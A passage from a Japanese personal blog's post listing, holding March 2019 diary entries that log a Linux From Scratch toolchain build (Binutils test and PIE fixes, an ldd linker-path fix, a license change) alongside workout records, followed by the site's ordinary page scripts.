                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>Binutilsのインストールが完了した

<ul>
<li>Hardening フラグを削除してもテストが失敗するのは GCCをDefault PIEでコンパイルしていたのが原因だった。</li>
<li>テストするときに、<code>CFLAGS</code>, <code>CXXFLAGS</code>, <code>CPPFLAGS</code>, <code>LDFLAGS</code>を取り除くだけでなく、<code>CC</code>と<code>CXX</code>に<code>-fno-PIE -no-pie</code>を加えてPIEを無効にしたら全テストが通るようになった</li>
</ul></li>
<li>GMPをインストールした</li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190320/">
                <h3 class="media-heading">日記 2019/03/20(水)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>Zlib, File, Readline, M4, Bcをインストールした</li>
<li>binutilsをビルド中

<ul>
<li>CPPFLAGSに<code>-D_FORTIFY_SOURCE=2</code>が入っているとlimits.hの存在チェックが壊れてビルドできななかった</li>
<li>CFLAGSとCXXFLAGSに<code>_FORTIFY_SOURCE</code>の定義を移して解決</li>
<li>ビルドが通るようになったがテストが通らない</li>
<li>CFLAGS, CXXFLAGS, CPPFLAGS, LDFLAGSを削除したらgold以外のテストは通るようになったので、 Hardening フラグのどれかが原因っぽい</li>
</ul></li>
</ul>

<h2 id="筋トレ">筋トレ</h2>

<ul>
<li>THE プレワークアウトを筋トレ30分前に1スクープ摂取</li>
<li>HMBを昼, トレーニング1時間前, 就寝前に1g摂取</li>
<li>前日の睡眠 7:23 (23:37-7:11)

<ul>
<li>あまりよく眠れなかった</li>
</ul></li>
<li>DiscordのJMusicBotをいじってたら時間がなくなってしまった</li>
</ul>

<p><strong>上半身プル</strong></p>

<table>
<thead>
<tr>
<th>種目</th>
<th>重量&amp;目標回数</th>
<th>回数</th>
<th>備考</th>
</tr>
</thead>

<tbody>
<tr>
<td>ハーフデッドリフト</td>
<td>3セット 30kg(27.5kgx2+シャフト) 21回以上</td>
<td>↓15 9 12</td>
<td>力を出しきれなかった</td>
</tr>

<tr>
<td>ワンハンドローイング</td>
<td>左右2セット 12.5kg(10kg+シャフト) 21回以上 →ドロップ</td>
<td>↓左15 右16 左17→5kgで12 右16→5kgで20</td>
<td></td>
</tr>

<tr>
<td>ダンベルシュラッグ</td>
<td>2セット 30kg(27.5kg+シャフトx2) 23回以上 →ドロップ</td>
<td>↓18 19</td>
<td></td>
</tr>

<tr>
<td>ダンベルカール</td>
<td>3セット 10kg(7.5kg+シャフト) 11回以上 →ドロップ</td>
<td></td>
<td>時間切れ</td>
</tr>

<tr>
<td>変形バックエクステンション</td>
<td>2セット 自重+5kg 16回以上 →ドロップ</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190319/">
                <h3 class="media-heading">日記 2019/03/19(火)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="linux-from-scratch">Linux from Scratch</h2>

<ul>
<li>lddが正常に動いていなかったのを直した

<ul>
<li><code>rtlddir</code>を<code>/usr/lib</code>に設定したとき <code>ldd</code>が64bitダイナミックリンカのパスとして <code>/usr/lib64/ld-linux-x86_64.so.2</code> を使っていたのが原因だった。</li>
<li><code>/usr/lib64</code>から<code>/usr/lib</code>へのシンボリックリンクを貼って解決</li>
</ul></li>
<li>ライセンス違反を解決

<ul>
<li>大部分がCC-BY-NC-SA 2.0のLFS Bookからの引用になったのに、リポジトリのライセンスが互換性のないGPLv3のままになっていた。</li>
<li>ライセンスをCC-BY-NC-SAに変更して解決</li>
</ul></li>
<li>Adjusting the Toolchain

<ul>
<li><code>/usr/lib32</code>に必要な32bitライブラリへのリンクを貼るのを忘れていたため、32bitでコンパイルできなかったのを直した</li>
</ul></li>
</ul>

<h2 id="筋トレ">筋トレ</h2></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://ngkz.github.io/2019/03/diary-20190318/">
                <h3 class="media-heading">日記 2019/03/18(月)</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="虚無">虚無</h2>

<p>生活リズムがおかしくなったせいか体調がよくないしやる気がしない</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero=""
         data-message-one=""
         data-message-other="">
         88 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://ngkz.github.io/images/cover.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://ngkz.github.io/js/script-qi9wbxp2ya2j6p7wx1i6tgavftewndznf4v0hy2gvivk1rxgc3lm7njqb6bz.min.js"></script>


<script lang="javascript">
window.onload = updateMinWidth;
window.onresize = updateMinWidth;
document.getElementById("sidebar").addEventListener("transitionend", updateMinWidth);
function updateMinWidth() {
  var sidebar = document.getElementById("sidebar");
  var main = document.getElementById("main");
  main.style.minWidth = "";
  var w1 = getComputedStyle(main).getPropertyValue("min-width");
  var w2 = getComputedStyle(sidebar).getPropertyValue("width");
  var w3 = getComputedStyle(sidebar).getPropertyValue("left");
  main.style.minWidth = `calc(${w1} - ${w2} - ${w3})`;
}
</script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/ngkz.github.io\/2014\/01\/seccon-2013-online-quals-writeup\/';
          
            this.page.identifier = '\/2014\/01\/seccon-2013-online-quals-writeup\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'ngkz-log';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  




    
  </body>
</html>

